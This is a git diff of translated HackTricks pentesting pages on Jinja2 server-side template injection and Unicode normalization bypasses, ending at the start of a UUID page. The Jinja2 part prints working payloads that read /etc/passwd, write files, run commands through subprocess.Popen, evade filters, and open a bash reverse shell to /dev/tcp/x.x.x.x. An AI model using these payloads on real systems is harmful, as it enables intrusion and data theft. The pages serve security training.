学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# Jinja2 SSTI
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## **实验**
```python
@ -30,9 +31,11 @@ return "Hello, send someting inside the param 'c'!"
if __name__ == "__main__":
app.run()
```
## **杂项**
### **调试语句**
如果启用了调试扩展,将会有一个 `debug` 标签可用于转储当前上下文以及可用的过滤器和测试。这对于查看模板中可用的内容而无需设置调试器非常有用。
如果启用了调试扩展,将会有一个 `debug` 标签可用于转储当前上下文以及可用的过滤器和测试。这对于查看模板中可以使用的内容而无需设置调试器非常有用。
```python
<pre>
@ -47,8 +50,6 @@ app.run()
</pre>
```
### **转储所有配置变量**
来源:[https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement](https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement)
```python
{{ config }} #In these object you can find all the configured env variables
@ -63,14 +64,14 @@ app.run()
```
## **Jinja注入**
## **Jinja 注入**
首先,在Jinja注入中您需要**找到一种方法来逃离沙盒**并恢复访问常规的Python执行流程。为此您需要**滥用**来自**非沙盒环境**但可以从沙盒访问的**对象**。
首先,在 Jinja 注入中,您需要**找到一种方法从沙箱中逃脱**并恢复访问常规的 Python 执行流程。为此,您需要**滥用对象**,这些对象**来自非沙箱环境,但可以从沙箱中访问**。
### 访问全局对象
例如,在代码`render_template("hello.html", username=username, email=email)`对象username和email**来自非沙盒的Python环境**,并将在**沙盒环境内**可访问。\
此外,还有其他对象将**始终可以从沙盒环境中访问**,这些对象包括
例如,在代码 `render_template("hello.html", username=username, email=email)` 中,对象 username 和 email **来自非沙箱的 Python 环境**,并且在**沙箱环境**中将是**可访问的**。\
此外,还有其他对象将**始终可以从沙箱环境中访问**,这些是
```
[]
''
@ -81,11 +82,11 @@ request
```
### 恢复 \<class 'object'>
然后,从这些对象中我们需要到达类:**`<class 'object'>`**,以便尝试**恢复**已定义的**类**。这是因为从这个对象中,我们可以调用**`__subclasses__`**方法并**访问来自非沙盒** python 环境的所有类。
然后,从这些对象中我们需要到达类:**`<class 'object'>`** 以尝试 **恢复** 定义的 **类**。这是因为从这个对象我们可以调用 **`__subclasses__`** 方法并 **访问所有非沙箱** python 环境中的类。
为了访问那个**对象类**,您需要**访问一个类对象**,然后访问**`__base__`**、**`__mro__()[-1]`**或**`mro()[-1]`**。然后,在到达这个**对象类**之后,我们**调用** **`__subclasses__()`**。
为了访问**对象类**,您需要 **访问一个类对象**,然后访问 **`__base__`**、**`__mro__()[-1]`** 或 **`mro()[-1]`**。然后,在到达这个 **对象类** 之后,我们 **调用** **`__subclasses__()`**。
查看这些示例:
查看这些示例:
```python
# To access a class object
[].__class__
@ -128,9 +129,9 @@ dict.__mro__[-1]
```
### RCE Escaping
**恢复了** `<class 'object'>` **并调用了** `__subclasses__` **之后,我们现在可以使用这些类来读取和写入文件并执行代码。**
**恢复了** `<class 'object'>` 并调用了 `__subclasses__`,我们现在可以使用这些类来读取和写入文件以及执行代码。
调用`__subclasses__` **为我们提供了访问数百个新函数的机会**,我们将很高兴地仅通过访问**文件类**来**读取/写入文件**或具有访问**允许执行命令**的类的类。 (如`os`)。
`__subclasses__` 的调用给了我们机会 **访问数百个新函数**,我们将仅通过访问 **文件类****读取/写入文件** 或任何具有访问权限的类,该类 **允许执行命令**(如 `os`)。
**读取/写入远程文件**
```python
@ -138,7 +139,7 @@ dict.__mro__[-1]
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
```
**远程代码执行(RCE**
**RCE**
```python
# The class 396 is the class <class 'subprocess.Popen'>
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
@ -161,18 +162,18 @@ dict.__mro__[-1]
{{ dict.mro()[-1].__subclasses__()[276](request.args.cmd,shell=True,stdout=-1).communicate()[0].strip() }}
```
要了解可以用来逃逸的**更多类**,您可以**查**以下内容
要了解可以使用的**更多类**以**逃避**,您可以**查**
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
{% endcontent-ref %}
### 过滤绕过
### 过滤绕过
#### 常见绕过方式
#### 常见绕过
这些绕过方式将允许我们**访问**对象的**属性**,而无需使用某些字符。\
我们已经在先前的示例中看到了一些这些绕过方式,但让我们在这里总结一下:
这些绕过将允许我们**访问**对象的**属性****而不使用某些字符**。\
我们已经在之前的示例中看到了一些这些绕过,但在这里总结一下:
```bash
# Without quotes, _, [, ]
## Basic ones
@ -201,25 +202,25 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
```
* [**点击此处查看更多访问全局对象的选项**](jinja2-ssti.md#accessing-global-objects)
* [**点击此处查看更多访问对象类的选项**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
* [**返回这里以获取更多访问全局对象的选项**](jinja2-ssti.md#accessing-global-objects)
* [**返回这里以获取更多访问对象类的选项**](jinja2-ssti.md#recovering-less-than-class-object-greater-than)
* [**阅读此内容以在没有对象类的情况下获得RCE**](jinja2-ssti.md#jinja-injection-without-less-than-class-object-greater-than)
**避免HTML编码**
默认情况下Flask会对模板中的所有内容进行HTML编码以确保安全性
默认情况下Flask出于安全原因对模板中的所有内容进行HTML编码
```python
{{'<script>alert(1);</script>'}}
#will be
&lt;script&gt;alert(1);&lt;/script&gt;
```
**`safe`** 过滤器允许我们将 JavaScript 和 HTML 注入到页面中,而**无需**对其进行**HTML 编码**,就像这样
**`safe`** 过滤器允许我们将 JavaScript 和 HTML 注入到页面中 **而不** 进行 **HTML 编码**,如下所示
```python
{{'<script>alert(1);</script>'|safe}}
#will be
<script>alert(1);</script>
```
**通过编写恶意配置文件实现远程代码执行RCE。**
**通过编写恶意配置文件进行RCE。**
```python
# evil config
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
@ -230,7 +231,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
# connect to evil host
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
```
## 没有几个字符
## Without several chars
没有 **`{{`** **`.`** **`[`** **`]`** **`}}`** **`_`**
```python
@ -241,12 +242,12 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
```
## 无需使用 **\<class 'object'>** 的 Jinja 注入
## Jinja 注入没有 **\<class 'object'>**
[**全局对象**](jinja2-ssti.md#accessing-global-objects)中有另一种方法可以实现 **RCE 而无需使用该类。**\
如果你设法访问到这些全局对象中的任何 **函数**,你将能够访问 **`__globals__.__builtins__`**,从那里 **RCE** 就非常 **简单**
[**全局对象**](jinja2-ssti.md#accessing-global-objects) 有另一种方法可以到达 **RCE 而不使用该类。**\
如果你设法从这些全局对象中获取任何 **函数**,你将能够访问 **`__globals__.__builtins__`**,从那里 **RCE** 是非常 **简单**
你可以使用以下方法从对象 **`request`**、**`config`** 和任何其他你可以访问的有趣 **全局对象****查找函数**
你可以通过以下方式从对象 **`request`**、**`config`** 和任何 **其他** 有趣的 **全局对象****找到函数**
```bash
{{ request.__class__.__dict__ }}
- application
@ -266,7 +267,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
# You can iterate through children objects to find more
```
一旦您找到了一些函数,您可以使用以下方法恢复内置函数:
一旦你找到了一些函数,你可以通过以下方式恢复内置函数:
```python
# Read file
{{ request.__class__._load_form_data.__globals__.__builtins__.open("/etc/passwd").read() }}
@ -289,7 +290,7 @@ http://localhost:5000/?c={{request|attr(request.args.getlist(request.args.l)|joi
```
### Fuzzing WAF bypass
**Fenjing** [https://github.com/Marven11/Fenjing](https://github.com/Marven11/Fenjing) 是一个专门用于 CTF 的工具,但也可以用于在真实场景中暴力破解无效参数。该工具只是向服务器发送单词和查询以检测过滤器,搜索绕过方式,并提供交互式控制台。
**Fenjing** [https://github.com/Marven11/Fenjing](https://github.com/Marven11/Fenjing) 是一个专门用于CTF的工具但在真实场景中也可以用于暴力破解无效参数。该工具仅仅喷射单词和查询以检测过滤器寻找绕过方法并提供一个交互式控制台。
```
webui:
As the name suggests, web UI
@ -314,23 +315,24 @@ crack-request: Read a request file for attack
Read the request in the file, PAYLOADreplace it with the actual payload and submit it
The request will be urlencoded by default according to the HTTP format, which can be --urlencode-payload 0turned off.
```
## 参考资料
## 参考文献
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
* 检查[此处的属性技巧以绕过被列入黑名单的字符](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3)。
* 查看 [attr trick to bypass blacklisted chars in here](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/#python3).
* [https://twitter.com/SecGus/status/1198976764351066113](https://twitter.com/SecGus/status/1198976764351066113)
* [https://hackmd.io/@Chivato/HyWsJ31dI](https://hackmd.io/@Chivato/HyWsJ31dI)
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# Unicode规范化
# Unicode Normalization
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,61 +29,61 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
***
**这是一个总结** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)。查看更多详细信息(图片取自该网站)。
**这是一个摘要** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)。请查看以获取更多详细信息(图片来自那里)。
## 理解Unicode和规范化
## Understanding Unicode and Normalization
Unicode规范化是一种确保字符的不同二进制表示标准化为相同二进制值的过程。这个过程在处理编程和数据处理中的字符串时至关重要。Unicode标准定义了两种字符等价性:
Unicode 规范化是一个确保字符的不同二进制表示标准化为相同二进制值的过程。这个过程在编程和数据处理中的字符串处理上至关重要。Unicode 标准定义了两种字符等价性:
1. **规范等价性**:如果字符在打印或显示时具有相同的外观和含义,则被视为规范等价
2. **兼容等价性**:一种较弱的等价形式,其中字符可能表示相同的抽象字符,但显示方式可能不同
1. **规范等价性**:如果字符在打印或显示时具有相同的外观和含义,则认为它们是规范等价的
2. **兼容等价性**:一种较弱的等价形式,其中字符可能表示相同的抽象字符,但可以以不同的方式显示
**四种Unicode规范化算法**NFC、NFD、NFKC和NFKD。每种算法以不同的方式应用规范和兼容规范化技术。要更深入地了解这些技术您可以在[Unicode.org](https://unicode.org/)上探索这些技术。
**四种 Unicode 规范化算法**NFC、NFD、NFKC 和 NFKD。每种算法以不同的方式采用规范和兼容性规范化技术。要深入了解您可以在 [Unicode.org](https://unicode.org/) 上探索这些技术。
### Unicode编码的关键要点
### Key Points on Unicode Encoding
理解Unicode编码至关重要特别是在处理不同系统或语言之间的互操作性问题时。以下是主要要点
理解 Unicode 编码至关重要,特别是在处理不同系统或语言之间的互操作性问题时。以下是主要要点:
* **代码点和字符**在Unicode中每个字符或符号都分配一个称为“代码点”的数值。
* **字节表示**:代码点(或字符)在内存中由一个或多个字节表示。例如,使用一个字节表示拉丁-1字符在讲英语的国家中很常见。但是具有更大字符集的语言需要更多字节来表示。
* **编码**:这个术语指的是如何将字符转换为一系列字节。UTF-8是一种流行的编码标准其中ASCII字符使用一个字节表示其他字符最多使用四个字节。
* **处理数据**:处理数据的系统必须了解所使用的编码,以便正确地将字节流转换为字符。
* **UTF的变体**除了UTF-8还有其他编码标准如UTF-16使用至少2个字节最多4个和UTF-32所有字符使用4个字节)。
* **代码点和字符**:在 Unicode 中,每个字符或符号都分配一个称为“代码点”的数值。
* **字节表示**:代码点(或字符)在内存中由一个或多个字节表示。例如,LATIN-1 字符(在英语国家常见)使用一个字节表示。然而,字符集较大的语言需要更多字节进行表示。
* **编码**:这个术语指的是字符如何转换为一系列字节。UTF-8 是一种流行的编码标准,其中 ASCII 字符使用一个字节表示,其他字符最多使用四个字节。
* **处理数据**:处理数据的系统必须了解所使用的编码,以正确地将字节流转换为字符。
* **UTF 的变体**:除了 UTF-8还有其他编码标准如 UTF-16使用最少 2 个字节,最多 4 个)和 UTF-32对所有字符使用 4 个字节)。
理解这些概念对于有效处理和减轻由Unicode的复杂性及其各种编码方法引起的潜在问题至关重要。
理解这些概念对于有效处理和缓解由于 Unicode 的复杂性及其各种编码方法引发的潜在问题至关重要。
一个示例,说明Unicode如何规范化表示同字符的两个不同字节:
Unicode 如何规范化两个表示同字符的不同字节的示例
```python
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
```
**Unicode等效字符列表可在此找到:** [https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html) 和 [https://0xacb.com/normalization\_table](https://0xacb.com/normalization\_table)
**Unicode 等效字符列表可以在这里找到:** [https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode\_normalization.html) 和 [https://0xacb.com/normalization\_table](https://0xacb.com/normalization\_table)
### 探索
### 发现
如果您可以在web应用程序中找到一个被回显的值您可以尝试发送**“开尔文符号”U+0212A**,它**归一化为“K”**(您可以发送它作为`%e2%84%aa`)。**如果回显了“K”**,那么可能正在执行某种**Unicode归一化**
如果你能在一个 webapp 中找到一个被回显的值,你可以尝试发送 **KELVIN SIGN (U+0212A)**,它 **规范化为 "K"**(你可以将其发送为 `%e2%84%aa`)。**如果回显了 "K"**,那么某种 **Unicode 规范化** 正在进行
另一个**示例**`%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` 经过**unicode**后为 `Leonishan`
另一个 **示例**`%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` **unicode** 之后是 `Leonishan`
## **易受攻击的示例**
### **SQL注入过滤器绕过**
### **SQL 注入过滤器绕过**
想象一个网页正在使用字符`'`来使用用户输入创建SQL查询。这个网页作为安全措施**删除**用户输入中所有出现的字符**`'`**,但在**删除**之后和**创建**查询之前,它使用**Unicode**对用户输入进行**归一化**
想象一个网页使用字符 `'` 来创建包含用户输入的 SQL 查询。这个网页作为安全措施,**删除** 用户输入中所有出现的字符 **`'`**,但 **在删除之后****创建查询之前**,它会 **使用 Unicode 规范化** 用户的输入
然后,恶意用户可以插入一个等效于`' (0x27)`的不同Unicode字符如`%ef%bc%87`,当输入被归一化时,一个单引号被创建,从而出现**SQL注入漏洞**
然后,一个恶意用户可以插入一个不同的 Unicode 字符,等同于 `' (0x27)`,如 `%ef%bc%87`,当输入被规范化时,会创建一个单引号,从而出现 **SQL 注入漏洞**
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (702).png>)
**一些有趣的Unicode字符**
**一些有趣的 Unicode 字符**
* `o` -- %e1%b4%bc
* `r` -- %e1%b4%bf
* `1` -- %c2%b9
* `=` -- %e2%81%bc
* `/` -- %ef%bc%8f
* `-`-- %ef%b9%a3
* `#`-- %ef%b9%9f
* `*`-- %ef%b9%a1
* `-` -- %ef%b9%a3
* `#` -- %ef%b9%9f
* `*` -- %ef%b9%a1
* `'` -- %ef%bc%87
* `"` -- %ef%bc%82
* `|` -- %ef%bd%9c
@ -103,23 +104,23 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
{% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %}
### XSS跨站脚本
### XSS跨站脚本攻击
您可以使用以下字符之一来欺骗 Web 应用程序并利用 XSS
您可以使用以下字符之一来欺骗 webapp 并利用 XSS
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
请注意,例如,第一个提出的 Unicode 字符可以发送为:`%e2%89%ae` 或 `%u226e`
请注意,例如,第一个建议的 Unicode 字符可以发送为:`%e2%89%ae` 或 `%u226e`
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
### 模糊正则表达式
### 模糊测试正则表达式
当后端**使用正则表达式检查用户输入**时,可能会出现**输入**被**规范化**用于**正则表达式**,但**未**用于其**使用**的情况。例如,在开放重定向或 SSRF 中,正则表达式可能会**规范化发送的 URL**,但然后**按原样访问**它
当后端 **检查用户输入的正则表达式** 时,**输入** 可能会为 **正则表达式** 进行 **规范化**,但 **不** 会为其 **使用** 的地方进行 **规范化**。例如,在开放重定向或 SSRF 中,正则表达式可能会 **规范化发送的 URL**,但随后 **按原样访问**
工具 [**recollapse**](https://github.com/0xacb/recollapse) 允许**生成输入的变体**以对后端进行模糊测试。有关更多信息,请查看**github**和此[**文章**](https://0xacb.com/2022/11/21/recollapse/)。
工具 [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* 允许 **生成输入的变体** 以模糊测试后端。有关更多信息,请查看 **github** 和这篇 [**文章**](https://0xacb.com/2022/11/21/recollapse/)。
## 参考资料
## 参考文献
* [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
@ -129,24 +130,25 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以在以下网站检查他们的网站并免费尝试他们的引擎:
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,76 +1,92 @@
# UUID安全漏洞
# UUID Insecurities
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
